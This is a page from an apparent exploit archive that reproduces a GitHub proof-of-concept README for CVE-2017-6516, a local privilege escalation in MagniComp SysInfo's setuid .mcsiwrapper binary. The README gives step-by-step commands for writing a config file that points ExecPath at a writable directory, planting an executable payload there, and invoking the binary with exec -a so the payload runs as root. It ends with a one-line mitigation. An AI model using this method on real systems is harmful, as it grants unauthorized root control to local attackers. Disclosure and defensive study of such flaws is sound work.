Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-6516 PoC — MagniComp Sysinfo 权限许可和访问控制问题漏洞

Source
https://github.com/Rubytox/CVE-2017-6516-mcsiwrapper-
Associated Vulnerability
Title:MagniComp Sysinfo 权限许可和访问控制问题漏洞 (CVE-2017-6516)
Description:A Local Privilege Escalation Vulnerability in MagniComp's Sysinfo before 10-H64 for Linux and UNIX platforms could allow a local attacker to gain elevated privileges. Parts of SysInfo require setuid-to-root access in order to access restricted system files and make restricted kernel calls. This access could be exploited by a local attacker to gain a root shell prompt using the right combination of environment variables and command line arguments.
Description
A PoC / methodology to exploit CVE-2017-6516
Readme
# CVE-2017-6516

CVE-2017-6516 is a privilege escalation vulnerability that targets the `.mcsiwrapper` binary from MagniCorp SysInfo under version 10-H64. When this binary has the SUID bit set and is outdated, a user may execute arbitrary code as the owner of the binary - which is often `root`.

## Requirements

- The binary `.mcsiwrapper` must be setuid:
```bash
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
```
- The binary `.mcsiwrapper` must be under version 10-H64:
```bash
$ .mcsiwrapper --version
<Version under 10-H64>
```

## Exploitation
Create a file `config` with the following contents:
```bash
ExecPath=<Path to a writeable directory>
```

Create a payload executable file in the `ExecPath` directory, for instance:
```bash
#!/bin/sh
whoami
```
And make it executable:
```bash
$ chmod +x payload
```

Run the command:
```bash
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
```

## Mitigations
Update `.mcsiwrapper` to at least 10-H64.
File Snapshot

 [4.0K]  /data/pocs/b26fa53b3670e5ec2292682948b9bafbe7245310
└── [ 997]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →